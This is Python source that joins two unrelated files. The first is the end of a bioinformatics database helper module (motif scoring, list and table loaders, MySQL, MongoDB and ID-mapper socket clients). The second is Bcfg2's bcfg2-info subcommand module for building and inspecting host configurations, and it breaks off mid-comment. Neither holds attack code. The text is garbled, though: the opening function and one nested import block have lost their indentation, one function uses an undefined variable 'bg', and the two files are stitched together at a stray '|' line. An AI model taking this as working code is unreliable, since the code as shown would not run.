scores = self.db.moods_scan(seq, MATRIX, BACKGROUND, thr)
return scores
def moods_score_naive(self, seq, mat, thr):
if len (mat[0])==4:
mat = list(np.array(mat).transpose())
MATRIX = motifmapcore.DoubleMat()
for row in mat:
d=motifmapcore.DoubleVec()
for ele in row:
d.append(ele)
MATRIX.append(d)
BACKGROUND = motifmapcore.DoubleVec()
for ele in bg:
BACKGROUND.append(ele)
scores = self.db.moods_naive_scan(seq, MATRIX, thr)
return scores
class ListDB(object):
    """
    A simple interface to delimiter based lists.
    """
    def __init__(self, fname, tname=None, kind="simple", sep="\n", col=None, delim="\t"):
        """
        fname may be a list/set of ids, or a path to one of:
        1, delimiter separated lists. Only contains ids, delimiters and white spaces
        2, multiple columns db with no header, specify which column to take as id
        3, a table with a header, specify header name
        """
        # in-memory list/set input: no file access at all
        if type(fname) == list or type(fname) == set:
            self.data = sorted(list(fname))
            self.data_unique = set(fname)
            self.tname = tname if tname else "CustomSet"
            return
        self.tname = tname if tname else fname
        if kind not in ["simple", "multiple", "table"]:
            # was `raise NotImplemented(...)`: NotImplemented is a plain
            # sentinel, not an exception, and is not even callable
            raise NotImplementedError("This kind of list is not supported")
        if kind == "multiple":
            if type(col) != int:
                raise TypeError("Please provide correct col number")
            lines = [i.strip() for i in open(fname).read().split(sep) if i.strip() != ""]
            self.data = [i.split(delim)[col] if len(i.split(delim)) > col else "" for i in lines]
            self.data = [i.strip() for i in self.data if i.strip() != ""]
        elif kind == "table":
            if type(col) != str:
                raise TypeError("Please provide correct col name")
            import pandas as pd
            df = pd.read_csv(fname, sep=sep)
            self.data = df[col].values
        else:
            self.data = [i.strip() for i in open(fname).read().split(sep) if i.strip() != ""]
        print("Loaded a list with %d elements" % len(self.data))
        self.data_unique = set(self.data)
    def cross(self, entry):
        """Return True if entry is present in the list."""
        return entry in self.data_unique
    def cross_mult(self, list_entry):
        """Return the sorted intersection of the list with list_entry."""
        return sorted(list(self.data_unique & set(list_entry)))
class TableDB(object):
    """
    A database to query csv like tables.
    """
    def __init__(self, fname, sep="\t", index=None):
        """Load the table at fname; `index` optionally names the index column."""
        import pandas as pd
        if index:
            # was pd.read_csv(fname, sep=sep, index=index): read_csv has
            # no `index` keyword (TypeError); the intended one is index_col
            self.df = pd.read_csv(fname, sep=sep, index_col=index)
        else:
            self.df = pd.read_csv(fname, sep=sep)
    def cross_mult(self, col, list_in):
        """Return the rows whose value in column `col` is in list_in."""
        return self.df[self.df[col].isin(list_in)]
class MySQLDB(object):
    """
    Interface to MySQL databases; reconnects automatically on a lost
    connection.
    """
    def __init__(self, db,
                 MYSQL_HOST="",
                 MYSQL_PORT="",
                 MYSQL_USER="",
                 MYSQL_PASS=""
                 ):
        print("TRYING TO CONNECT TO DB %s" % db)
        self.dbname = db
        self.host = MYSQL_HOST
        self.port = MYSQL_PORT
        self.user = MYSQL_USER
        self.pwd = MYSQL_PASS
        self.db = MySQLdb.connect(host=self.host,
                                  user=self.user,
                                  passwd=self.pwd,
                                  db=db,
                                  port=self.port)
        self.cur = self.db.cursor()
    def connect(self):
        """(Re)open the underlying connection."""
        self.db = MySQLdb.connect(host=self.host,
                                  user=self.user,
                                  passwd=self.pwd,
                                  db=self.dbname,
                                  port=self.port)
    def query(self, sql):
        """Execute sql (reconnecting once if needed) and return the cursor used."""
        try:
            cursor = self.db.cursor()
            cursor.execute(sql)
        except (AttributeError, MySQLdb.OperationalError):
            self.connect()
            cursor = self.db.cursor()
            cursor.execute(sql)
        return cursor
    def execute_sql(self, sql):
        """
        Execute SQL with the opened db.
        """
        self.query(sql)
    def fetch_sql(self, sql):
        """
        Execute sql and return all result rows.
        """
        # was: self.query(sql) followed by self.cur.fetchall() -- query()
        # executes on a *fresh* cursor, so the stale self.cur returned no
        # rows; fetch from the cursor that actually ran the statement
        return self.query(sql).fetchall()
    def pandas_sql(self, sql):
        """Run sql and return the result as a pandas DataFrame."""
        print("EXECUTING SQL %s" % sql)
        df = pd.read_sql(sql, self.db)
        if len(df) == 0:
            print("WARNING: pandas table has 0 rows")
        return df
class MongoDB(object):
    """
    Interface to pymongo databases.
    """
    def __init__(self, db,
                 MONGO_SERVER='',
                 MONGO_PORT=0
                 ):
        import pymongo
        self.con = pymongo.MongoClient(MONGO_SERVER, MONGO_PORT)
        self.db = self.con[db]
    def find_one_from_table(self, tbl, key="_id", val=None):
        """Return the first document of tbl where key == str(val)."""
        if val is None:
            raise ValueError("Please provide query value")
        tbl = self.db[tbl]
        return tbl.find_one({key: str(val)})
    def find_multi_from_table(self, tbl, key=None, val=None):
        """Return a cursor over tbl, optionally filtered by key == str(val)."""
        if key is None:
            return self.db[tbl].find()
        if val is None:
            raise ValueError("Please provide query value")
        tbl = self.db[tbl]
        return tbl.find({key: str(val)})
    def drop_table(self, tbl):
        """Drop the collection tbl."""
        print("DROPPING TABLE {}".format(tbl))
        self.db[tbl].drop()
    def insert(self, tbl, query=None):
        """Insert a document into tbl (an empty document by default)."""
        # was query={}: a mutable default argument is shared across calls,
        # so one caller's mutation leaked into subsequent calls
        if query is None:
            query = {}
        print("INSERTING TO {}".format(tbl))
        self.db[tbl].insert(query)
        return
class IDMapperDB(object):
    """
    A db layer for id conversion via idmapper.py.
    """
    def __init__(self,
                 PORTNUM=0,
                 HOST=''
                 ):
        self.port = PORTNUM
        self.host = HOST
    def convertIDs(self, ids=None, fromType="OFFICIAL_GENE_SYMBOL", toType="UNIPROT_ACCESSION", species="",
                   asType="pairs", filterNA=True):
        """
        This client code uses the ID mapper server to convert IDs, currently it is mainly useful for
        converting various IDs to and from Uniprots
        the fromType and toType listings are included above and species only work if the to type is
        uniprot and it filters the converted uniprots to validated species specific prots only.
        """
        # socket was previously imported only inside __init__, so this
        # method raised NameError; import it where it is used
        import socket
        HOST = self.host
        PORTNUM = self.port
        FROMTYPES = [
            "OFFICIAL_GENE_SYMBOL",
            "ENTREZ_GENE_ID",
            "UNIPROT_ACCESSION",
            "UCSC_GENE_ID",
            "REFSEQ_MRNA",
            "REFSEQ_PROTEIN",
            "REFSEQ_NT2",
            "REFSEQ_NT",
        ]
        TOTYPES = [
            "OFFICIAL_GENE_SYMBOL",
            "ENTREZ_GENE_ID",
            "UNIPROT_ACCESSION",
            "UNIPROT_ACCESSION_SPECIES",
            "GO_ACCESSION",
            "UCSC_GENE_ID",
            "REFSEQ_MRNA",
            "REFSEQ_PROTEIN",
            "REFSEQ_NT2",
            "REFSEQ_NT",
        ]
        SPECIES = [
            "MOUSE",
            "HUMAN"]
        if ids is None:
            print("Please input list of ids or text of ids")
            return None
        if fromType not in FROMTYPES:
            print("from type not available, available ones are %s" % FROMTYPES)
            return None
        if toType not in TOTYPES:
            print("to type not available, available ones are %s" % TOTYPES)
            return None
        # was `species is not ""` / `toType is not "..."`: identity
        # comparison with string literals is implementation-defined;
        # equality is the correct test
        if species != "":
            if species not in SPECIES or toType != "UNIPROT_ACCESSION":
                print("Species can only be HUMAN or MOUSE and only when to type is UNIPROT_ACCESSION")
                return None
        if type(ids) == str:
            ids = [i.strip() for i in ids.split("\n") if i.strip() != ""]
            ids = [i.split("\t") for i in ids]
            ids = [i for j in ids for i in j if i != ""]
            # grabs formatted tsv
        if type(ids) == list:
            ids = [str(i) for i in ids if str(i) != ""]
        if species:
            cmd = "from " + fromType + " to " + toType + "_" + species
        else:
            cmd = "from " + fromType + " to " + toType
        try:
            results = []
            # query the server in chunks of 100 ids
            for _ids in [ids[i:i + 100] for i in range(0, len(ids), 100)]:
                msg = cmd + "\n" + "\n".join(_ids) + "\nFIN"
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.connect((HOST, PORTNUM))
                sock.sendall(msg)
                buf = ""
                while True:
                    tbuf = sock.recv(4096)
                    if not tbuf:
                        break
                    buf += tbuf
                _results = [(i.split(",")[0], i.split(",")[1]) for i in buf.split("\n") if "," in i]
                results += sorted(list(set(_results)))
            if filterNA:
                results = [x for x in results if x[1] != "N/A"]
            # pad ids that got no mapping at all
            for i in ids:
                if i not in dict(results):
                    results += [(i, "NA")]
            if asType == "pairs":
                pass
            elif asType == "tabs":
                # results holds (src, dst) tuples, not comma-joined
                # strings; the original split tuples on "," and raised
                # AttributeError here
                results = [src + "\t" + dst for src, dst in results]
                results = "\n".join(results)
            return results
        except socket.error as err:
            print("Error occured: " + repr(err))
            return None
|
# -*- coding: utf-8 -*-
""" Subcommands and helpers for bcfg2-info """
import os
import sys
import cmd
import math
import time
import copy
import pipes
import fnmatch
import argparse
import operator
import lxml.etree
import traceback
from code import InteractiveConsole
import Bcfg2.Logger
import Bcfg2.Options
import Bcfg2.Server.Core
import Bcfg2.Server.Plugin
import Bcfg2.Client.Tools.POSIX
from Bcfg2.Compat import any # pylint: disable=W0622
try:
try:
import cProfile as profile
except ImportError:
import profile
import pstats
HAS_PROFILE = True
except ImportError:
HAS_PROFILE = False
def print_tabular(rows):
    """Print data in tabular format; rows[0] is taken as the header row."""
    # column width: widest cell in each column, plus one space of padding
    cmax = tuple([max([len(str(row[index])) for row in rows]) + 1
                  for index in range(len(rows[0]))])
    # (the original first built an unused " %-Ns |"-style format string and
    # immediately overwrote it; the dead assignment has been removed)
    fstring = ('|'.join([" %%-%ss "] * len(cmax))) % cmax
    print(fstring % rows[0])
    # separator length = column widths + 2 pad chars per column + dividers
    print((sum(cmax) + (len(cmax) * 2) + (len(cmax) - 1)) * '=')
    for row in rows[1:]:
        print(fstring % row)
def display_trace(trace):
    """ display statistics from a profile trace """
    # sort_stats returns the Stats object, so the calls chain
    pstats.Stats(trace).sort_stats('cumulative', 'calls',
                                   'time').print_stats(200)
def load_interpreters():
    """ Load a dict of available Python interpreters """
    # the plain stdlib console is always available and is the fallback
    available = dict(python=lambda v: InteractiveConsole(v).interact())
    best = "python"
    try:
        import bpython.cli
        available["bpython"] = lambda v: bpython.cli.main(args=[],
                                                          locals_=v)
        best = "bpython"
    except ImportError:
        pass
    try:
        # whether ipython is actually better than bpython is
        # up for debate, but this is the behavior that existed
        # before --interpreter was added, so we call IPython
        # better
        import IPython
        # pylint: disable=E1101
        if hasattr(IPython, "Shell"):
            available["ipython"] = lambda v: \
                IPython.Shell.IPShell(argv=[], user_ns=v).mainloop()
            best = "ipython"
        elif hasattr(IPython, "embed"):
            available["ipython"] = lambda v: IPython.embed(user_ns=v)
            best = "ipython"
        else:
            print("Unknown IPython API version")
        # pylint: enable=E1101
    except ImportError:
        pass
    return (available, best)
class InfoCmd(Bcfg2.Options.Subcommand):  # pylint: disable=W0223
    """ Base class for bcfg2-info subcommands """
    def _expand_globs(self, globs, candidates):
        """ Given a list of globs, select the items from candidates
        that match the globs """
        # fast path: nothing to filter, or an explicit match-everything
        if not globs or '*' in globs:
            return candidates
        if not any(set('*?[]') & set(pattern) for pattern in globs):
            # no wildcard characters anywhere: the globs are plain names
            return globs
        matched = set()
        pool = set(candidates)
        for pattern in globs:
            hits = set(c for c in pool if fnmatch.fnmatch(c, pattern))
            matched.update(hits)
            # already-matched candidates need not be tested again
            pool.difference_update(hits)
        return list(matched)
    def get_client_list(self, globs):
        """ given a list of host globs, get a list of clients that
        match them """
        return self._expand_globs(globs, self.core.metadata.clients)
    def get_group_list(self, globs):
        """ given a list of group glob, get a list of groups that
        match them"""
        return self._expand_globs(globs,
                                  list(self.core.metadata.groups.keys()))
class Debug(InfoCmd):
    """ Shell out to a Python interpreter """
    # interpreters available on this machine, detected once at
    # class-definition time; the best one found becomes the default
    interpreters, default_interpreter = load_interpreters()
    options = [
        Bcfg2.Options.BooleanOption(
            "-n", "--non-interactive",
            help="Do not enter the interactive debugger"),
        Bcfg2.Options.PathOption(
            "-f", dest="cmd_list", type=argparse.FileType('r'),
            help="File containing commands to run"),
        Bcfg2.Options.Option(
            "--interpreter", cf=("bcfg2-info", "interpreter"),
            env="BCFG2_INFO_INTERPRETER",
            choices=interpreters.keys(), default=default_interpreter)]
    def run(self, setup):
        # batch mode: push each line of the command file through a console
        if setup.cmd_list:
            console = InteractiveConsole(locals())
            for command in setup.cmd_list.readlines():
                console.push(command.rstrip())
        # interactive mode: drop into the chosen interpreter with the
        # server core's locals in scope
        if not setup.non_interactive:
            print("Dropping to interpreter; press ^D to resume")
            self.interpreters[setup.interpreter](self.core.get_locals())
class Build(InfoCmd):
    """ Build config for hostname, writing to filename """
    options = [Bcfg2.Options.PositionalArgument("hostname"),
               Bcfg2.Options.PositionalArgument("filename", nargs='?',
                                                default=sys.stdout,
                                                type=argparse.FileType('w'))]
    def run(self, setup):
        """Serialize the client's full configuration as pretty XML."""
        config = self.core.BuildConfiguration(setup.hostname)
        tree = lxml.etree.ElementTree(config)
        try:
            tree.write(setup.filename,
                       encoding='UTF-8', xml_declaration=True,
                       pretty_print=True)
        except IOError:
            err = sys.exc_info()[1]
            print("Failed to write %s: %s" % (setup.filename, err))
class Builddir(InfoCmd):
    """ Build config for hostname, writing separate files to directory
    """
    # don't try to install these types of entries
    blacklisted_types = ["nonexistent", "permissions"]
    options = Bcfg2.Client.Tools.POSIX.POSIX.options + [
        Bcfg2.Options.PositionalArgument("hostname"),
        Bcfg2.Options.PathOption("directory")]
    help = """Generates a config for client <hostname> and writes the
individual configuration files out separately in a tree under <output
dir>. This only handles file entries, and does not respect 'owner' or
'group' attributes unless run as root. """
    def run(self, setup):
        # paranoid-mode backups make no sense for a scratch tree
        setup.paranoid = False
        client_config = self.core.BuildConfiguration(setup.hostname)
        if client_config.tag == 'error':
            print("Building client configuration failed.")
            return 1
        # collect only installable Path entries, re-rooted under the
        # output directory
        entries = []
        for struct in client_config:
            for entry in struct:
                if (entry.tag == 'Path' and
                    entry.get("type") not in self.blacklisted_types):
                    failure = entry.get("failure")
                    if failure is not None:
                        print("Skipping entry %s:%s with bind failure: %s" %
                              (entry.tag, entry.get("name"), failure))
                        continue
                    # rewrite the absolute path to live inside <directory>
                    entry.set('name',
                              os.path.join(setup.directory,
                                           entry.get('name').lstrip("/")))
                    entries.append(entry)
        # let the POSIX client tool actually write the files out
        Bcfg2.Client.Tools.POSIX.POSIX(client_config).Install(entries)
class Buildfile(InfoCmd):
    """ Build config file for hostname """
    options = [
        Bcfg2.Options.Option("-f", "--outfile", metavar="<path>",
                             type=argparse.FileType('w'), default=sys.stdout),
        Bcfg2.Options.PathOption("--altsrc"),
        Bcfg2.Options.PathOption("filename"),
        Bcfg2.Options.PositionalArgument("hostname")]
    def run(self, setup):
        """Bind one Path entry for the host and write it as XML."""
        entry = lxml.etree.Element('Path', name=setup.filename)
        if setup.altsrc:
            entry.set("altsrc", setup.altsrc)
        try:
            metadata = self.core.build_metadata(setup.hostname)
            self.core.Bind(entry, metadata)
        except:  # pylint: disable=W0702
            print("Failed to build entry %s for host %s" % (setup.filename,
                                                            setup.hostname))
            raise
        try:
            xml = lxml.etree.tostring(entry,
                                      xml_declaration=False).decode('UTF-8')
            setup.outfile.write(xml)
            setup.outfile.write("\n")
        except IOError:
            err = sys.exc_info()[1]
            print("Failed to write %s: %s" % (setup.outfile.name, err))
class BuildAllMixin(object):
    """ InfoCmd mixin to make a version of an existing command that
    applies to multiple hosts"""
    directory_arg = Bcfg2.Options.PathOption("directory")
    hostname_arg = Bcfg2.Options.PositionalArgument("hostname", nargs='*',
                                                    default=[])
    options = [directory_arg, hostname_arg]
    @property
    def _parent(self):
        """ the parent command: the first InfoCmd subclass in the MRO
        other than InfoCmd itself and this class """
        for cls in self.__class__.__mro__:
            if (cls != InfoCmd and cls != self.__class__ and
                    issubclass(cls, InfoCmd)):
                return cls
    def run(self, setup):
        """ Run the parent command once per selected client """
        import errno
        try:
            os.makedirs(setup.directory)
        except OSError:
            err = sys.exc_info()[1]
            # an already-existing directory is fine (was the magic
            # number 17); anything else is fatal
            if err.errno != errno.EEXIST:
                print("Could not create %s: %s" % (setup.directory, err))
                return 1
        clients = self.get_client_list(setup.hostname)
        for client in clients:
            csetup = self._get_setup(client, copy.copy(setup))
            csetup.hostname = client
            self._parent.run(self, csetup)  # pylint: disable=E1101
    def _get_setup(self, client, setup):
        """ This can be overridden by children to populate individual
        setup options on a per-client basis """
        raise NotImplementedError
class Buildallfile(Buildfile, BuildAllMixin):
    """ Build config file for all clients in directory """
    options = [BuildAllMixin.directory_arg,
               Bcfg2.Options.PathOption("--altsrc"),
               Bcfg2.Options.PathOption("filename"),
               BuildAllMixin.hostname_arg]
    def run(self, setup):
        """Delegate to the multi-host driver in BuildAllMixin."""
        BuildAllMixin.run(self, setup)
    def _get_setup(self, client, setup):
        """Point each per-client setup at <directory>/<client> for output."""
        setup.outfile = open(os.path.join(setup.directory, client), 'w')
        return setup
class Buildall(Build, BuildAllMixin):
    """ Build configs for all clients in directory """
    options = BuildAllMixin.options
    def run(self, setup):
        """Delegate to the multi-host driver in BuildAllMixin."""
        BuildAllMixin.run(self, setup)
    def _get_setup(self, client, setup):
        """Write each client's config to <directory>/<client>.xml."""
        setup.filename = os.path.join(setup.directory, client + ".xml")
        return setup
class Buildbundle(InfoCmd):
    """ Render a templated bundle for hostname """
    options = [Bcfg2.Options.PositionalArgument("bundle"),
               Bcfg2.Options.PositionalArgument("hostname")]
    def run(self, setup):
        """Render the named bundle against the host's metadata and print it."""
        bundler = self.core.plugins['Bundler']
        bundle = None
        if setup.bundle in bundler.entries:
            bundle = bundler.entries[setup.bundle]
        elif not setup.bundle.endswith(".xml"):
            # also accept the bundle name without its .xml extension
            fname = setup.bundle + ".xml"
            if fname in bundler.entries:
                # was bundler.entries[bundle]: `bundle` is still None at
                # this point, so the lookup always raised KeyError(None)
                bundle = bundler.entries[fname]
        if not bundle:
            print("No such bundle %s" % setup.bundle)
            return 1
        try:
            metadata = self.core.build_metadata(setup.hostname)
            print(lxml.etree.tostring(bundle.XMLMatch(metadata),
                                      xml_declaration=False,
                                      pretty_print=True).decode('UTF-8'))
        except:  # pylint: disable=W0702
            print("Failed to render bundle %s for host %s: %s" %
                  (setup.bundle, setup.hostname, sys.exc_info()[1]))
            raise
class Automatch(InfoCmd):
    """ Perform automatch on a Properties file """
    options = [
        Bcfg2.Options.BooleanOption(
            "-f", "--force",
            help="Force automatch even if it's disabled"),
        Bcfg2.Options.PositionalArgument("propertyfile"),
        Bcfg2.Options.PositionalArgument("hostname")]
    def run(self, setup):
        """Render the property file as it would automatch for the host."""
        try:
            props = self.core.plugins['Properties']
        except KeyError:
            print("Properties plugin not enabled")
            return 1
        pfile = props.entries[setup.propertyfile]
        # automatch runs if forced, enabled globally, or enabled on the file
        enabled = (Bcfg2.Options.setup.force or
                   Bcfg2.Options.setup.automatch or
                   pfile.xdata.get("automatch", "false").lower() == "true")
        if not enabled:
            print("Automatch not enabled on %s" % setup.propertyfile)
        else:
            metadata = self.core.build_metadata(setup.hostname)
            print(lxml.etree.tostring(pfile.XMLMatch(metadata),
                                      xml_declaration=False,
                                      pretty_print=True).decode('UTF-8'))
class ExpireCache(InfoCmd):
    """ Expire the metadata cache """
    only_interactive = True
    options = [
        Bcfg2.Options.PositionalArgument(
            "hostname", nargs="*", default=[],
            help="Expire cache for the given host(s)")]
    def run(self, setup):
        """Expire cached metadata, per-host if hosts were given."""
        if not setup.hostname:
            self.core.metadata_cache.expire()
            return
        for client in self.get_client_list(setup.hostname):
            self.core.metadata_cache.expire(client)
class EventDebug(InfoCmd):
    """ Enable debugging output for FAM events """
    only_interactive = True
    aliases = ['event_debug']
    def run(self, _):
        """Turn on debug logging in the file-activity monitor."""
        self.core.fam.set_debug(True)
class Bundles(InfoCmd):
    """ Print out group/bundle info """
    options = [Bcfg2.Options.PositionalArgument("group", nargs='*')]
    def run(self, setup):
        """Tabulate each selected group with its comma-joined bundle list."""
        rows = [('Group', 'Bundles')]
        for group in sorted(self.get_group_list(setup.group)):
            rows.append((group,
                         ','.join(self.core.metadata.groups[group][0])))
        print_tabular(rows)
class Clients(InfoCmd):
    """ Print out client/profile info """
    options = [Bcfg2.Options.PositionalArgument("hostname", nargs='*',
                                                default=[])]
    def run(self, setup):
        """Tabulate each selected client with its profile group."""
        rows = [('Client', 'Profile')]
        for client in sorted(self.get_client_list(setup.hostname)):
            meta = self.core.metadata.get_initial_metadata(client)
            rows.append((client, meta.profile))
        print_tabular(rows)
class Config(InfoCmd):
    """ Print out the current configuration of Bcfg2"""
    options = [
        Bcfg2.Options.BooleanOption(
            "--raw",
            help="Produce more accurate but less readable raw output")]
    def run(self, setup):
        parser = Bcfg2.Options.get_parser()
        data = [('Description', 'Value')]
        for option in parser.option_list:
            if hasattr(setup, option.dest):
                value = getattr(setup, option.dest)
                # component-loading options hold classes (or lists of
                # classes); show their names instead of full reprs
                # unless --raw was requested
                if any(issubclass(a.__class__,
                                  Bcfg2.Options.ComponentAction)
                       for a in option.actions.values()):
                    if not setup.raw:
                        try:
                            if option.action.islist:
                                value = [v.__name__ for v in value]
                            else:
                                value = value.__name__
                        except AttributeError:
                            # just use the value as-is
                            pass
                if setup.raw:
                    value = repr(value)
                data.append((getattr(option, "help", option.dest), value))
        print_tabular(data)
class Probes(InfoCmd):
    """ Get probes for the given host """
    options = [
        Bcfg2.Options.BooleanOption("-p", "--pretty",
                                    help="Human-readable output"),
        Bcfg2.Options.PositionalArgument("hostname")]
    def run(self, setup):
        """Collect the host's probes and print them as text or XML."""
        # a list for pretty output, an XML container otherwise; both
        # support .append(), so collection below is shared
        if setup.pretty:
            probes = []
        else:
            probes = lxml.etree.Element('probes')
        metadata = self.core.build_metadata(setup.hostname)
        for plugin in self.core.plugins_by_type(Bcfg2.Server.Plugin.Probing):
            for probe in plugin.GetProbes(metadata):
                probes.append(probe)
        if not setup.pretty:
            print(lxml.etree.tostring(probes, xml_declaration=False,
                                      pretty_print=True).decode('UTF-8'))
            return
        for probe in probes:
            pname = probe.get("name")
            banner = "=" * (len(pname) + 2)
            print(banner)
            print(" %s" % pname)
            print(banner)
            print("")
            print(probe.text)
            print("")
class Showentries(InfoCmd):
    """ Show abstract configuration entries for a given host """
    options = [Bcfg2.Options.PositionalArgument("hostname"),
               Bcfg2.Options.PositionalArgument("type", nargs='?')]
    def run(self, setup):
        """Tabulate the abstract entries of the host, optionally by type."""
        try:
            metadata = self.core.build_metadata(setup.hostname)
        except Bcfg2.Server.Plugin.MetadataConsistencyError:
            print("Unable to build metadata for %s: %s" % (setup.hostname,
                                                           sys.exc_info()[1]))
            # was missing: execution previously fell through and raised
            # NameError on the never-assigned `metadata`
            return 1
        structures = self.core.GetStructures(metadata)
        output = [('Entry Type', 'Name')]
        etypes = None
        if setup.type:
            # bound entries carry a "Bound" tag prefix; accept both
            etypes = [setup.type, "Bound%s" % setup.type]
        for item in structures:
            output.extend((child.tag, child.get('name'))
                          for child in item.getchildren()
                          if not etypes or child.tag in etypes)
        print_tabular(output)
class Groups(InfoCmd):
    """ Print out group info """
    options = [Bcfg2.Options.PositionalArgument("group", nargs='*')]
    def _profile_flag(self, group):
        """ Whether or not the group is a profile group """
        return 'yes' if self.core.metadata.groups[group].is_profile else 'no'
    def run(self, setup):
        """Tabulate each selected group with its profile flag and category."""
        rows = [("Groups", "Profile", "Category")]
        for group in sorted(self.get_group_list(setup.group)):
            rows.append((group,
                         self._profile_flag(group),
                         self.core.metadata.groups[group].category))
        print_tabular(rows)
class Showclient(InfoCmd):
    """ Show metadata for the given hosts """
    options = [Bcfg2.Options.PositionalArgument("hostname", nargs='*')]
    def run(self, setup):
        for client in self.get_client_list(setup.hostname):
            try:
                metadata = self.core.build_metadata(client)
            except Bcfg2.Server.Plugin.MetadataConsistencyError:
                print("Could not build metadata for %s: %s" %
                      (client, sys.exc_info()[1]))
                continue
            fmt = "%-10s %s"
            print(fmt % ("Hostname:", metadata.hostname))
            print(fmt % ("Profile:", metadata.profile))
            group_fmt = "%-10s %-30s %s"
            header = False
            # the "Groups:" label is only printed on the first line;
            # each group also shows its category when one matches
            for group in sorted(list(metadata.groups)):
                category = ""
                for cat, grp in metadata.categories.items():
                    if grp == group:
                        category = "Category: %s" % cat
                        break
                if not header:
                    print(group_fmt % ("Groups:", group, category))
                    header = True
                else:
                    print(group_fmt % ("", group, category))
            if metadata.bundles:
                # same first-line-label layout for bundles
                sorted_bundles = sorted(list(metadata.bundles))
                print(fmt % ("Bundles:", sorted_bundles[0]))
                for bnd in sorted_bundles[1:]:
                    print(fmt % ("", bnd))
            if metadata.connectors:
                print("Connector data")
                print("=" * 80)
                # connectors attach data as attributes on the metadata
                # object, keyed by the connector's name
                for conn in metadata.connectors:
                    if getattr(metadata, conn):
                        print(fmt % (conn + ":", getattr(metadata, conn)))
                print("=" * 80)
class Mappings(InfoCmd):
    """ Print generator mappings for optional type and name """
    options = [Bcfg2.Options.PositionalArgument("type", nargs='?'),
               Bcfg2.Options.PositionalArgument("name", nargs='?')]
    def run(self, setup):
        data = [('Plugin', 'Type', 'Name')]
        for generator in self.core.plugins_by_type(
                Bcfg2.Server.Plugin.Generator):
            # was `etypes = setup.type or list(...)`: when a type was
            # given, the loops below iterated the *characters* of the
            # type string so the filter never matched anything
            if setup.type:
                etypes = [setup.type]
            else:
                etypes = list(generator.Entries.keys())
            if setup.name:
                interested = [(etype, [setup.name]) for etype in etypes]
            else:
                interested = [(etype, generator.Entries[etype])
                              for etype in etypes
                              if etype in generator.Entries]
            for etype, names in interested:
                data.extend((generator.name, etype, name)
                            for name in names
                            if name in generator.Entries.get(etype, {}))
        print_tabular(data)
class PackageResolve(InfoCmd):
    """ Resolve packages for the given host"""
    options = [Bcfg2.Options.PositionalArgument("hostname"),
               Bcfg2.Options.PositionalArgument("package", nargs="*")]
    def run(self, setup):
        # the Packages plugin is optional; bail out gracefully if absent
        try:
            pkgs = self.core.plugins['Packages']
        except KeyError:
            print("Packages plugin not enabled")
            return 1
        metadata = self.core.build_metadata(setup.hostname)
        # container that receives the newly-resolved Package entries
        indep = lxml.etree.Element("Independent",
                                   name=self.__class__.__name__.lower())
        if setup.package:
            # resolve only the packages named on the command line
            structures = [lxml.etree.Element("Bundle", name="packages")]
            for package in setup.package:
                lxml.etree.SubElement(structures[0], "Package", name=package)
        else:
            # no packages given: resolve everything in the host's config
            structures = self.core.GetStructures(metadata)
        pkgs._build_packages(metadata, indep,  # pylint: disable=W0212
                             structures)
        print("%d new packages added" % len(indep.getchildren()))
        if len(indep.getchildren()):
            print(" %s" % "\n ".join(lxml.etree.tostring(p)
                                     for p in indep.getchildren()))
class Packagesources(InfoCmd):
    """ Show package sources """
    options = [Bcfg2.Options.PositionalArgument("hostname")]
    def run(self, setup):
        """Print the package source list for the host's collection."""
        try:
            pkgs = self.core.plugins['Packages']
        except KeyError:
            print("Packages plugin not enabled")
            return 1
        try:
            metadata = self.core.build_metadata(setup.hostname)
        except Bcfg2.Server.Plugin.MetadataConsistencyError:
            err = sys.exc_info()[1]
            print("Unable to build metadata for %s: %s" % (setup.hostname,
                                                           err))
            return 1
        collection = pkgs.get_collection(metadata)
        print(collection.sourcelist())
class Query(InfoCmd):
    """ Query clients """
    options = [
        Bcfg2.Options.ExclusiveOptionGroup(
            Bcfg2.Options.Option(
                "-g", "--group", metavar="<group>", dest="querygroups",
                type=Bcfg2.Options.Types.comma_list),
            Bcfg2.Options.Option(
                "-p", "--profile", metavar="<profile>", dest="queryprofiles",
                type=Bcfg2.Options.Types.comma_list),
            Bcfg2.Options.Option(
                "-b", "--bundle", metavar="<bundle>", dest="querybundles",
                type=Bcfg2.Options.Types.comma_list),
            required=True)]
    def run(self, setup):
        """Print the clients matching the profile/group/bundle query."""
        metadata = self.core.metadata
        if setup.queryprofiles:
            res = metadata.get_client_names_by_profiles(setup.queryprofiles)
        elif setup.querygroups:
            res = metadata.get_client_names_by_groups(setup.querygroups)
        elif setup.querybundles:
            res = metadata.get_client_names_by_bundles(setup.querybundles)
        print("\n".join(res))
class Quit(InfoCmd):
    """ Exit program """
    only_interactive = True
    aliases = ['exit', 'EOF']
    def run(self, _):
        """Terminate the interactive session with exit status 0."""
        raise SystemExit(0)
class Shell(InfoCmd):
    """ Open an interactive shell to run multiple bcfg2-info commands """
    interactive = False
    def run(self, setup):
        """Enter the command loop; Ctrl-C exits cleanly."""
        try:
            self.core.cli.cmdloop('Welcome to bcfg2-info\n'
                                  'Type "help" for more information')
        except KeyboardInterrupt:
            print("\nCtrl-C pressed, exiting...")
class Update(InfoCmd):
    """ Process pending filesystem events """
    only_interactive = True
    def run(self, _):
        """Give the FAM a short window to flush any queued events."""
        self.core.fam.handle_events_in_interval(0.1)
class ProfileTemplates(InfoCmd):
    """ Benchmark template rendering times """
    options = [
        Bcfg2.Options.Option(
            "--clients", type=Bcfg2.Options.Types.comma_list,
            help="Benchmark templates for the named clients"),
        Bcfg2.Options.Option(
            "--runs", help="Number of rendering passes per template",
            default=5, type=int),
        Bcfg2.Options.PositionalArgument(
            "templates", nargs="*", default=[],
            help="Profile the named templates instead of all templates")]
    def profile_entry(self, entry, metadata, runs=5):
        """ Profile a single entry; returns the list of per-run bind times """
        times = []
        for i in range(runs):  # pylint: disable=W0612
            start = time.time()
            try:
                self.core.Bind(entry, metadata)
                times.append(time.time() - start)
            except:  # pylint: disable=W0702
                # a failed bind aborts further runs for this entry
                break
        if times:
            avg = sum(times) / len(times)
            if avg:
                self.logger.debug(" %s: %.02f sec" %
                                  (metadata.hostname, avg))
        return times
    def profile_struct(self, struct, metadata, templates=None, runs=5):
        """ Profile all entries in a given structure """
        times = dict()
        entries = struct.xpath("//Path")
        entry_count = 0
        for entry in entries:
            entry_count += 1
            if templates is None or entry.get("name") in templates:
                self.logger.info("Rendering Path:%s (%s/%s)..." %
                                 (entry.get("name"), entry_count,
                                  len(entries)))
                # setdefault: each template is only timed once even if it
